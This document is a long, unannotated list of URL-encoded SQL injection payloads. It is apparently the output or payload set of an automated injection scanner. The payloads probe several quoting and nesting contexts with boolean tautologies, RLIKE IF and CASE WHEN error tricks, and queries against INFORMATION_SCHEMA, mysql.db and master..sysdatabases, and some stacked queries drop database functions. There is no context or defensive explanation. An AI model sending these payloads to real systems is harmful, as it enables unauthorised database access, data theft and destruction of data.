-2556%27%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%28%27YsuF%27%20LIKE%20%27YsuF -1958%27%29%29%20OR%20NOT%20%289348%3D1614%29--%20%20AND%20%28%28%27EWKZ%27%20LIKE%20%27EWKZ -1351%27%29%29%29%20OR%20NOT%20%281747%3D2743%29--%20%20AND%20%28%28%28%27gcqk%27%20LIKE%20%27gcqk -4056%27%29%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%28%28%27YucT%27%20LIKE%20%27YucT -4088%27%29%29%29%20OR%20NOT%20%286286%3D7419%29--%20%20AND%20%28%28%28%27SGgV%27%20LIKE%20%27SGgV -3936%27%20OR%20NOT%20%288994%3D5357%29--%20%20AND%20%27ZAwo%27%20LIKE%20%27ZAwo -3858%27%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%27XqGS%27%20LIKE%20%27XqGS -1881%27%20OR%20NOT%20%281985%3D7769%29--%20%20AND%20%27DkUG%27%20LIKE%20%27DkUG -3793%22%29%20OR%20NOT%20%283478%3D5627%29--%20%20AND%20%28%22imin%22%3D%22imin -3056%22%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%22keiy%22%3D%22keiy -4812%22%29%20OR%20NOT%20%281724%3D9593%29--%20%20AND%20%28%22Jnxb%22%3D%22Jnxb -5049%22%29%29%20OR%20NOT%20%283583%3D5526%29--%20%20AND%20%28%28%22LuSD%22%3D%22LuSD -2850%22%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%28%22tdgY%22%3D%22tdgY -7522%22%29%29%20OR%20NOT%20%289457%3D9512%29--%20%20AND%20%28%28%22SjLL%22%3D%22SjLL -5904%22%29%29%29%20OR%20NOT%20%286031%3D2164%29--%20%20AND%20%28%28%28%22wCiY%22%3D%22wCiY -3204%22%29%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%28%28%22oigz%22%3D%22oigz -1664%22%29%29%29%20OR%20NOT%20%284501%3D3393%29--%20%20AND%20%28%28%28%22SfjT%22%3D%22SfjT -2484%22%20OR%20NOT%20%284577%3D9683%29--%20%20AND%20%22xKsa%22%3D%22xKsa -3963%22%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%22kmCK%22%3D%22kmCK -4221%22%20OR%20NOT%20%281234%3D6883%29--%20%20AND%20%22UmvD%22%3D%22UmvD -6768%22%29%20OR%20NOT%20%282293%3D6436%29--%20%20AND%20%28%22QeCG%22%20LIKE%20%22QeCG -4454%22%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%22npxj%22%20LIKE%20%22npxj -5321%22%29%20OR%20NOT%20%287516%3D9003%29--%20%20AND%20%28%22omXT%22%20LIKE%20%22omXT -4766%22%29%29%20OR%20NOT%20%287552%3D4727%29--%20%20AND%20%28%28%22ovkK%22%20LIKE%20%22ovkK -7723%22%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%28%22GHez%22%20LIKE%20%22GHez -8033%22%29%29%20OR%20NOT%20%287886%3D4021%29--%20%20AND%20%28%28%22NSgX%22%20LIKE%20%22NSgX -3069%22%29%29%29%20OR%20NOT%20%288161%3D9245%29--%20%20AND%20%28%28%28%22zeij%22%20LIKE%20%22zeij -5415%22%29%29%29%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%28%28%28%22bVmH%22%20LIKE%20%22bVmH -8433%22%29%29%29%20OR%20NOT%20%283193%3D5525%29--%20%20AND%20%28%28%28%22fLue%22%20LIKE%20%22fLue -8700%22%20OR%20NOT%20%289414%3D8703%29--%20%20AND%20%22ohtj%22%20LIKE%20%22ohtj -1149%22%20OR%20NOT%20%287158%3D7158%29--%20%20AND%20%22KUBM%22%20LIKE%20%22KUBM -9849%22%20OR%20NOT%20%288370%3D3215%29--%20%20AND%20%22knlT%22%20LIKE%20%22knlT -8255%29%20WHERE%208223%3D8223%20OR%20NOT%20%281615%3D1579%29--%20 -3645%29%20WHERE%201910%3D1910%20OR%20NOT%20%287158%3D7158%29--%20 -4156%29%20WHERE%203249%3D3249%20OR%20NOT%20%288124%3D6143%29--%20 -6189%27%29%20WHERE%207266%3D7266%20OR%20NOT%20%289758%3D4899%29--%20 -2380%27%29%20WHERE%209359%3D9359%20OR%20NOT%20%287158%3D7158%29--%20 -4306%27%29%20WHERE%207378%3D7378%20OR%20NOT%20%289540%3D7110%29--%20 -1043%27%20WHERE%203431%3D3431%20OR%20NOT%20%287769%3D9925%29--%20 -5057%27%20WHERE%203984%3D3984%20OR%20NOT%20%287158%3D7158%29--%20 -4134%27%20WHERE%202656%3D2656%20OR%20NOT%20%281669%3D4293%29--%20 -9543%22%20WHERE%208600%3D8600%20OR%20NOT%20%281563%3D6663%29--%20 -2815%22%20WHERE%206043%3D6043%20OR%20NOT%20%287158%3D7158%29--%20 -5075%22%20WHERE%202446%3D2446%20OR%20NOT%20%287556%3D8764%29--%20 foo%29%20RLIKE%20IF%287647%3D7647%2Cfoo%2C0x28%29 foo%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29 foo%29%20RLIKE%20IF%289905%3D9905%2Cfoo%2C0x28%29 foo%27%29%20RLIKE%20IF%288503%3D8503%2Cfoo%2C0x28%29 foo%27%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29 foo%27%29%20RLIKE%20IF%282382%3D2382%2Cfoo%2C0x28%29 foo%27%20RLIKE%20IF%285246%3D5246%2Cfoo%2C0x28%29 foo%27%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29 foo%27%20RLIKE%20IF%284376%3D4376%2Cfoo%2C0x28%29 foo%22%20RLIKE%20IF%285581%3D5581%2Cfoo%2C0x28%29 foo%22%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29 foo%22%20RLIKE%20IF%283019%3D3019%2Cfoo%2C0x28%29 foo%29%20RLIKE%20IF%281624%3D1624%2Cfoo%2C0x28%29%20AND%20%284069%3D4069 foo%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%283433%3D3433 foo%29%20RLIKE%20IF%285255%3D5255%2Cfoo%2C0x28%29%20AND%20%285326%3D5326 foo%29%29%20RLIKE%20IF%285694%3D5694%2Cfoo%2C0x28%29%20AND%20%28%281398%3D1398 foo%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%287903%3D7903 foo%29%29%20RLIKE%20IF%288926%3D8926%2Cfoo%2C0x28%29%20AND%20%28%286375%3D6375 foo%29%29%29%20RLIKE%20IF%283719%3D3719%2Cfoo%2C0x28%29%20AND%20%28%28%286266%3D6266 foo%29%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%28%289035%3D9035 foo%29%29%29%20RLIKE%20IF%287282%3D7282%2Cfoo%2C0x28%29%20AND%20%28%28%283591%3D3591 ## foo%20RLIKE%20IF%281715%3D1715%2Cfoo%2C0x28%29 ## foo%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29 ## foo%20RLIKE%20IF%286680%3D6680%2Cfoo%2C0x28%29 foo%27%29%20RLIKE%20IF%289530%3D9530%2Cfoo%2C0x28%29%20AND%20%28%27lkkn%27%3D%27lkkn foo%27%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%27dbyl%27%3D%27dbyl foo%27%29%20RLIKE%20IF%284369%3D4369%2Cfoo%2C0x28%29%20AND%20%28%27kiZF%27%3D%27kiZF foo%27%29%29%20RLIKE%20IF%281877%3D1877%2Cfoo%2C0x28%29%20AND%20%28%28%27TUcq%27%3D%27TUcq foo%27%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%28%27EyWk%27%3D%27EyWk foo%27%29%29%20RLIKE%20IF%285726%3D5726%2Cfoo%2C0x28%29%20AND%20%28%28%27Iudj%27%3D%27Iudj foo%27%29%29%29%20RLIKE%20IF%285927%3D5927%2Cfoo%2C0x28%29%20AND%20%28%28%28%27yPPg%27%3D%27yPPg foo%27%29%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%28%28%27vYzF%27%3D%27vYzF foo%27%29%29%29%20RLIKE%20IF%289125%3D9125%2Cfoo%2C0x28%29%20AND%20%28%28%28%27aOaC%27%3D%27aOaC foo%27%20RLIKE%20IF%286117%3D6117%2Cfoo%2C0x28%29%20AND%20%27fPOx%27%3D%27fPOx foo%27%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%27rmlj%27%3D%27rmlj foo%27%20RLIKE%20IF%283303%3D3303%2Cfoo%2C0x28%29%20AND%20%27nynR%27%3D%27nynR foo%27%29%20RLIKE%20IF%283473%3D3473%2Cfoo%2C0x28%29%20AND%20%28%27YgAF%27%20LIKE%20%27YgAF foo%27%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%27SxoV%27%20LIKE%20%27SxoV foo%27%29%20RLIKE%20IF%282156%3D2156%2Cfoo%2C0x28%29%20AND%20%28%27kWul%27%20LIKE%20%27kWul foo%27%29%29%20RLIKE%20IF%282106%3D2106%2Cfoo%2C0x28%29%20AND%20%28%28%27lxNY%27%20LIKE%20%27lxNY foo%27%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%28%27uZkc%27%20LIKE%20%27uZkc foo%27%29%29%20RLIKE%20IF%284720%3D4720%2Cfoo%2C0x28%29%20AND%20%28%28%27iuKH%27%20LIKE%20%27iuKH foo%27%29%29%29%20RLIKE%20IF%282651%3D2651%2Cfoo%2C0x28%29%20AND%20%28%28%28%27HlGI%27%20LIKE%20%27HlGI foo%27%29%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%28%28%27zCiy%27%20LIKE%20%27zCiy foo%27%29%29%29%20RLIKE%20IF%288701%3D8701%2Cfoo%2C0x28%29%20AND%20%28%28%28%27QWJW%27%20LIKE%20%27QWJW foo%27%20RLIKE%20IF%284757%3D4757%2Cfoo%2C0x28%29%20AND%20%27VGfK%27%20LIKE%20%27VGfK foo%27%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%27poHM%27%20LIKE%20%27poHM foo%27%20RLIKE%20IF%288026%3D8026%2Cfoo%2C0x28%29%20AND%20%27Tbju%27%20LIKE%20%27Tbju foo%22%29%20RLIKE%20IF%287777%3D7777%2Cfoo%2C0x28%29%20AND%20%28%22HDrH%22%3D%22HDrH foo%22%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%22uPTJ%22%3D%22uPTJ foo%22%29%20RLIKE%20IF%289226%3D9226%2Cfoo%2C0x28%29%20AND%20%28%22BYTx%22%3D%22BYTx foo%22%29%29%20RLIKE%20IF%287049%3D7049%2Cfoo%2C0x28%29%20AND%20%28%28%22MpyW%22%3D%22MpyW foo%22%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%28%22Hbqe%22%3D%22Hbqe foo%22%29%29%20RLIKE%20IF%282970%3D2970%2Cfoo%2C0x28%29%20AND%20%28%28%22bqWY%22%3D%22bqWY foo%22%29%29%29%20RLIKE%20IF%284910%3D4910%2Cfoo%2C0x28%29%20AND%20%28%28%28%22ZMJT%22%3D%22ZMJT foo%22%29%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%28%28%22MnaX%22%3D%22MnaX foo%22%29%29%29%20RLIKE%20IF%284458%3D4458%2Cfoo%2C0x28%29%20AND%20%28%28%28%22SmcF%22%3D%22SmcF foo%22%20RLIKE%20IF%288185%3D8185%2Cfoo%2C0x28%29%20AND%20%22CbjI%22%3D%22CbjI foo%22%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%22SblJ%22%3D%22SblJ foo%22%20RLIKE%20IF%287530%3D7530%2Cfoo%2C0x28%29%20AND%20%22JaMX%22%3D%22JaMX foo%22%29%20RLIKE%20IF%289533%3D9533%2Cfoo%2C0x28%29%20AND%20%28%22QcHA%22%20LIKE%20%22QcHA foo%22%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%22pEUk%22%20LIKE%20%22pEUk foo%22%29%20RLIKE%20IF%283465%3D3465%2Cfoo%2C0x28%29%20AND%20%28%22YFts%22%20LIKE%20%22YFts foo%22%29%29%20RLIKE%20IF%284224%3D4224%2Cfoo%2C0x28%29%20AND%20%28%28%22Tzib%22%20LIKE%20%22Tzib foo%22%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%28%22uAoc%22%20LIKE%20%22uAoc foo%22%29%29%20RLIKE%20IF%285300%3D5300%2Cfoo%2C0x28%29%20AND%20%28%28%22Hagy%22%20LIKE%20%22Hagy foo%22%29%29%29%20RLIKE%20IF%285887%3D5887%2Cfoo%2C0x28%29%20AND%20%28%28%28%22Phnp%22%20LIKE%20%22Phnp foo%22%29%29%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%28%28%28%22oRzo%22%20LIKE%20%22oRzo foo%22%29%29%29%20RLIKE%20IF%289275%3D9275%2Cfoo%2C0x28%29%20AND%20%28%28%28%22xhnc%22%20LIKE%20%22xhnc foo%22%20RLIKE%20IF%283675%3D3675%2Cfoo%2C0x28%29%20AND%20%22CRoZ%22%20LIKE%20%22CRoZ foo%22%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20AND%20%22KwqY%22%20LIKE%20%22KwqY foo%22%20RLIKE%20IF%287708%3D7708%2Cfoo%2C0x28%29%20AND%20%22PdjQ%22%20LIKE%20%22PdjQ foo%29%20WHERE%204351%3D4351%20RLIKE%20IF%289520%3D9520%2Cfoo%2C0x28%29 foo%29%20WHERE%204642%3D4642%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29 foo%29%20WHERE%206857%3D6857%20RLIKE%20IF%284049%3D4049%2Cfoo%2C0x28%29 foo%27%29%20WHERE%207111%3D7111%20RLIKE%20IF%289421%3D9421%2Cfoo%2C0x28%29 foo%27%29%20WHERE%208749%3D8749%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29 foo%27%29%20WHERE%205184%3D5184%20RLIKE%20IF%287477%3D7477%2Cfoo%2C0x28%29 foo%27%20WHERE%206120%3D6120%20RLIKE%20IF%287137%3D7137%2Cfoo%2C0x28%29 foo%27%20WHERE%203174%3D3174%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29 foo%27%20WHERE%209897%3D9897%20RLIKE%20IF%288165%3D8165%2Cfoo%2C0x28%29 foo%22%20WHERE%204319%3D4319%20RLIKE%20IF%286797%3D6797%2Cfoo%2C0x28%29 foo%22%20WHERE%202765%3D2765%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29 foo%22%20WHERE%201963%3D1963%20RLIKE%20IF%284612%3D4612%2Cfoo%2C0x28%29 foo%27%20%7C%7C%20%28SELECT%201928%20FROM%20DUAL%20WHERE%205396%3D5396%20RLIKE%20IF%288102%3D8102%2Cfoo%2C0x28%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205450%20FROM%20DUAL%20WHERE%209832%3D9832%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202197%20FROM%20DUAL%20WHERE%204075%3D4075%20RLIKE%20IF%281815%3D1815%2Cfoo%2C0x28%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%201465%20WHERE%201634%3D1634%20RLIKE%20IF%288629%3D8629%2Cfoo%2C0x28%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203744%20WHERE%201855%3D1855%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205424%20WHERE%201447%3D1447%20RLIKE%20IF%281155%3D1155%2Cfoo%2C0x28%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%202942%20FROM%20DUAL%20WHERE%201841%3D1841%20RLIKE%20IF%284216%3D4216%2Cfoo%2C0x28%29%20%29 foo%20%2B%20%28SELECT%209212%20FROM%20DUAL%20WHERE%205678%3D5678%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20%29 foo%20%2B%20%28SELECT%204545%20FROM%20DUAL%20WHERE%203909%3D3909%20RLIKE%20IF%287028%3D7028%2Cfoo%2C0x28%29%20%29 foo%20%2B%20%28SELECT%205852%20WHERE%202313%3D2313%20RLIKE%20IF%281508%3D1508%2Cfoo%2C0x28%29%20%29 foo%20%2B%20%28SELECT%201445%20WHERE%206034%3D6034%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20%29 foo%20%2B%20%28SELECT%205148%20WHERE%209307%3D9307%20RLIKE%20IF%287402%3D7402%2Cfoo%2C0x28%29%20%29 foo%27%20%2B%20%28SELECT%20%27UOQb%27%20FROM%20DUAL%20WHERE%204504%3D4504%20RLIKE%20IF%289818%3D9818%2Cfoo%2C0x28%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27jDJw%27%20FROM%20DUAL%20WHERE%203133%3D3133%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27bfBk%27%20FROM%20DUAL%20WHERE%209401%3D9401%20RLIKE%20IF%286422%3D6422%2Cfoo%2C0x28%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27nTjg%27%20WHERE%209078%3D9078%20RLIKE%20IF%288530%3D8530%2Cfoo%2C0x28%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27hfbI%27%20WHERE%205825%3D5825%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27KNiZ%27%20WHERE%204666%3D4666%20RLIKE%20IF%282851%3D2851%2Cfoo%2C0x28%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%284039%3D4039%2Cfoo%2C0x28%29%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%284002%3D4002%2Cfoo%2C0x28%29%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%284105%3D4105%2Cfoo%2C0x28%29%20%23 %28SELECT%20%28CASE%20WHEN%20%289454%3D6685%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%284242%3D4242%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%287929%3D7277%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%29%20END%29%29 MAKE_SET%282859%3D2845%2Cfoo%29 MAKE_SET%284940%3D4940%2Cfoo%29 MAKE_SET%289910%3D2984%2Cfoo%29 ELT%288421%3D6069%2Cfoo%29 ELT%286483%3D6483%2Cfoo%29 ELT%284207%3D4103%2Cfoo%29 #%286084%3D2374%29%2Afoo #%286707%3D6707%29%2Afoo #%283189%3D6589%29%2Afoo %28SELECT%20%28CASE%20WHEN%20%289472%3D8835%29%20THEN%20foo%20ELSE%209472%2A%28SELECT%209472%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%284953%3D4953%29%20THEN%20foo%20ELSE%204953%2A%28SELECT%204953%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%287027%3D9469%29%20THEN%20foo%20ELSE%207027%2A%28SELECT%207027%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%286297%3D6706%29%20THEN%20foo%20ELSE%206297%2A%28SELECT%206297%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281287%3D1287%29%20THEN%20foo%20ELSE%201287%2A%28SELECT%201287%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%284916%3D6467%29%20THEN%20foo%20ELSE%204916%2A%28SELECT%204916%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20GENERATE_SERIES%28foo%2Cfoo%2CCASE%20WHEN%20%288017%3D1725%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20GENERATE_SERIES%28foo%2Cfoo%2CCASE%20WHEN%20%286422%3D6422%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20GENERATE_SERIES%28foo%2Cfoo%2CCASE%20WHEN%20%289255%3D9830%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20%28CASE%20WHEN%20%287281%3D9430%29%20THEN%20foo%20ELSE%207281%2A%28SELECT%207281%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%284213%3D4213%29%20THEN%20foo%20ELSE%204213%2A%28SELECT%204213%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%283571%3D4854%29%20THEN%20foo%20ELSE%203571%2A%28SELECT%203571%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%289602%3D1423%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%289171%3D9171%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%287941%3D2789%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 IIF%286952%3D5972%2Cfoo%2C1%2F0%29 IIF%283599%3D3599%2Cfoo%2C1%2F0%29 IIF%285884%3D4012%2Cfoo%2C1%2F0%29 %28CASE%20WHEN%209899%3D5099%20THEN%20foo%20ELSE%20NULL%20END%29 %28CASE%20WHEN%201809%3D1809%20THEN%20foo%20ELSE%20NULL%20END%29 %28CASE%20WHEN%209675%3D5880%20THEN%20foo%20ELSE%20NULL%20END%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%289530%3D7933%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%284831%3D4831%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%288512%3D7190%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%287755%3D8562%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%285817%3D5817%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%289562%3D3444%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%289919%3D1180%29%20THEN%20foo%20ELSE%209919%2A%28SELECT%209919%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%286385%3D6385%29%20THEN%20foo%20ELSE%206385%2A%28SELECT%206385%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%282164%3D7860%29%20THEN%20foo%20ELSE%202164%2A%28SELECT%202164%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%284114%3D9496%29%20THEN%20foo%20ELSE%204114%2A%28SELECT%204114%20FROM%20mysql.db%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%287495%3D7495%29%20THEN%20foo%20ELSE%207495%2A%28SELECT%207495%20FROM%20mysql.db%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%284763%3D4974%29%20THEN%20foo%20ELSE%204763%2A%28SELECT%204763%20FROM%20mysql.db%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%285171%3D8520%29%20THEN%20foo%20ELSE%205171%2A%28SELECT%205171%20FROM%20master..sysdatabases%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%289342%3D9342%29%20THEN%20foo%20ELSE%209342%2A%28SELECT%209342%20FROM%20master..sysdatabases%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%287392%3D1168%29%20THEN%20foo%20ELSE%207392%2A%28SELECT%207392%20FROM%20master..sysdatabases%29%20END%29%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%285012%3D3112%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%281097%3D1097%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 foo%2C%28SELECT%20%28CASE%20WHEN%20%288534%3D7404%29%20THEN%20foo%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 foo%2CIIF%282510%3D9436%2Cfoo%2C1%2F0%29 foo%2CIIF%284002%3D4002%2Cfoo%2C1%2F0%29 foo%2CIIF%287281%3D4660%2Cfoo%2C1%2F0%29 foo%29%3B%20IF%28%289963%3D9894%29%2CSELECT%209963%2CDROP%20FUNCTION%20QroX%29%3B%23 foo%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23 foo%29%3B%20IF%28%286278%3D8923%29%2CSELECT%206278%2CDROP%20FUNCTION%20UHNx%29%3B%23 foo%27%29%3B%20IF%28%288413%3D5867%29%2CSELECT%208413%2CDROP%20FUNCTION%20PQyU%29%3B%23 foo%27%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23 foo%27%29%3B%20IF%28%284421%3D4772%29%2CSELECT%204421%2CDROP%20FUNCTION%20Zpnv%29%3B%23 foo%27%3B%20IF%28%288140%3D3766%29%2CSELECT%208140%2CDROP%20FUNCTION%20hehV%29%3B%23 foo%27%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23 foo%27%3B%20IF%28%286324%3D6062%29%2CSELECT%206324%2CDROP%20FUNCTION%20ZkMQ%29%3B%23 foo%22%3B%20IF%28%284702%3D5417%29%2CSELECT%204702%2CDROP%20FUNCTION%20VwsR%29%3B%23 foo%22%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23 foo%22%3B%20IF%28%285432%3D8352%29%2CSELECT%205432%2CDROP%20FUNCTION%20aKjg%29%3B%23 foo%29%3B%20IF%28%286681%3D9099%29%2CSELECT%206681%2CDROP%20FUNCTION%20cgIq%29%3B%23%20AND%20%284596%3D4596 foo%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%287585%3D7585 foo%29%3B%20IF%28%288887%3D7702%29%2CSELECT%208887%2CDROP%20FUNCTION%20Uyvc%29%3B%23%20AND%20%287233%3D7233 foo%29%29%3B%20IF%28%288708%3D3788%29%2CSELECT%208708%2CDROP%20FUNCTION%20RiHR%29%3B%23%20AND%20%28%286571%3D6571 foo%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%284447%3D4447 foo%29%29%3B%20IF%28%288957%3D2610%29%2CSELECT%208957%2CDROP%20FUNCTION%20fOqJ%29%3B%23%20AND%20%28%283435%3D3435 foo%29%29%29%3B%20IF%28%289256%3D5702%29%2CSELECT%209256%2CDROP%20FUNCTION%20iRII%29%3B%23%20AND%20%28%28%283502%3D3502 foo%29%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%28%282406%3D2406 foo%29%29%29%3B%20IF%28%282331%3D3741%29%2CSELECT%202331%2CDROP%20FUNCTION%20iplX%29%3B%23%20AND%20%28%28%285443%3D5443 foo%3B%20IF%28%285800%3D1462%29%2CSELECT%205800%2CDROP%20FUNCTION%20haAB%29%3B%23 foo%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23 foo%3B%20IF%28%289304%3D1725%29%2CSELECT%209304%2CDROP%20FUNCTION%20pFaw%29%3B%23 foo%27%29%3B%20IF%28%282820%3D1528%29%2CSELECT%202820%2CDROP%20FUNCTION%20bKDo%29%3B%23%20AND%20%28%27vaNH%27%3D%27vaNH foo%27%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%27hUkm%27%3D%27hUkm foo%27%29%3B%20IF%28%289950%3D9211%29%2CSELECT%209950%2CDROP%20FUNCTION%20thBr%29%3B%23%20AND%20%28%27XTyS%27%3D%27XTyS foo%27%29%29%3B%20IF%28%285557%3D2931%29%2CSELECT%205557%2CDROP%20FUNCTION%20nWEM%29%3B%23%20AND%20%28%28%27vUCp%27%3D%27vUCp 